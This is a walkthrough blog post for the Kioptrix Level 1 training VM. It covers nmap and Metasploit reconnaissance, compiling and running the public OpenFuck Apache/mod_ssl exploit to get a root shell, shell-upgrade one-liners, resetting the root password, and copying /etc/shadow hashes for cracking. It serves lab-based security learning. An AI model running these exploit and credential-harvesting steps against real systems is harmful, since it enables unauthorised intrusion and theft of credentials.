So, I'm doing a cource on Udemy, https://www.udemy.com/course/practical-ethical-hacking/learn/lecture/17084434?start=705#overview
And one of the target machines was kioptrix VM, so how do you solve it. It's actually quite easy, as it should be for a beginner VM, but let me give you some pointers, if you want to try it yourself :) SPOILER, SOLUTION PROVIDED !!
So, if you're read the spoiler in the start of the tutorial, and want to jump into some hacking, let's do it. I won't provide you with how to setup a Kali VM / Kali Box, you should be able to do this yourself, and while you're at it, install VirtualBox also, you'll need it later.
If you've done installing Kali and Virtualbox, head on over to download the VM, https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Setup a VM, set network bridged-network, so it will get an IP address from your router in the same network range as your workstation, and fire up the VM.
Find it with nmap, so you know the IP address of the VM, and let's start have some fun. First, let's run some nmap against it.
nmap -T4 -p- -A (Set Time 4, ALL Ports, ALL details)
Here we launch nmap, set speed 4, try all ports, from 1-65535, and all OS details, for max results.
Let it run until it's done, and you should get something like this.
Nmap scan report for 10.0.0.xxx
Host is up (0.0021s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
32768/tcp open filenet-tms
MAC Address: 08:00:27:06:5A:4F (Oracle VirtualBox virtual NIC)
If you look a little closer at the output from nmap, you might see some details, and they are.
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
So, we got Apache 1.3.20 installed on a Redhat system. That's a start. We got SSH, but, we don't know what Samba version is running, hmm. Maybe the Metasploit Framework got a scanner for that in it's aux modules ? Let's go take a look. Fire up msfconsole.
msfconsole
msf6 > search aux smb
52 auxiliary/fuzzers/smb/smb_tree_connect normal No SMB Tree Connect Request Fuzzer
53 auxiliary/scanner/smb/smb_enumusers normal No SMB User Enumeration (SAM EnumUsers)
54 auxiliary/scanner/smb/smb_version normal No SMB Version Detection
msf6 > use 54
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 10.0.0.105
rhosts => 10.0.0.105
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 10.0.0.105:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 10.0.0.105:139 - Host could not be identified: Unix (Samba 2.2.1a)
[*] 10.0.0.105: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) >
So, we got a Samba 2.2.1a version running. That's what we wanted to find out. Now we know we might be able to attack either Apache or Samba.
I wonder if we can connect to the Samba server, let's try it :)
smbclient -U '' \\\\TARGET_IP\\SHARE$
Try the IPC$ share, the ADMIN$ won't work. You don't got access rights for the IPC share, but it will connect, so we can send traffic to the smb port.
So, we need an exploit for this, since we also assume that SSH is closed up, and we don't have credentials for it, not yet.
If you google around for a bit, you will find something called OpenFuck, if not you can download it directly
git clone https://github.com/heltonWernik/OpenFuck.git
It's not compiled, so we need to do that, and we do it like this
gcc -o OpenFuck OpenFuck.c -lcrypto
Now it's time for some fun. Run it with
./OpenFuck
Now, it's gonna give you a very long list of different targets, so pick the right one, since the return addresses are hardcoded for different operating systems. Kioptrix' is option 0x6b, so we run the exploit like this
./OpenFuck 0x6b 10.0.0.xx -c 40
When it runs, it says something like this
ptrace-kmod.c:183:1: warning: no newline at end of file
[+] Attached to 2055
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
Try to see if you got a shell by trying a normal whoami command. Note you only see the response from the command.
whoami
root
hostname
kioptrix.level1
whoami command, and output root. hostname command, and output kioptrix.level1
So, we have a working shell, but it's not a "real" shell, so can we do something about that. There are a couple of things we can try, try the following commands, one by one and see if you get a "real" shell.
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
# from within irb
exec "/bin/sh"
# from within vi
:!bash
:set shell=/bin/bash:shell
Sometimes you can spawn a real shell with these, depending on the system, but why not go for the real easy win. Remember that SSH server ?. We didn't have credentials for it, and we don't need them now, we got a root shell. But, what if we want to come back ? We can add a user, or simply set a password we know for the root user.
passwd root
Type your new password, and while you're here, cat /etc/password and /etc/shadow, and save the users hashes, and try to crack them as a bonus.
Let's see if that SSH access works. SSH into the box, and you'll see you can't connect to it. But why ? SSH is running..
ssh 10.0.0.xx 130 ⨯
Unable to negotiate with 10.0.0.xx port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
So, we don't got the kex algorithms set, how can we solve that ? Try to have a look at the man page for ssh og sshd_config. We need a parameter called -o KexAlgorithms=+
ssh 10.0.0.xxx -o KexAlgorithms=+diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
Now it's bitching again, this time about ciphers
Unable to negotiate with 10.0.0.xxx port 22: no matching cipher found. Their offer: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,This email address is being protected from spambots. You need JavaScript enabled to view it.
See the first options, aes-cbc128 ?, let's try it and see if we can connect.
ssh 10.0.0.xxx -o KexAlgorithms=+diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 -c aes128-cbc 255 ⨯
The authenticity of host '10.0.0.xxx (10.0.0.xxx)' can't be established.
RSA key fingerprint is SHA256:VDo/h/SG4A6H+WPH3LsQqw1jwjyseGYq9nLeRWPCY/A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.0.xxx' (RSA) to the list of known hosts.
This email address is being protected from spambots. You need JavaScript enabled to view it.'s password:
Bang, we're in :)
That's it, we just hacked into a Redhat Box. So, now you know a little about how you pentest a box, so go forth with the others from vulnhub :)
Much Happy Hacking :)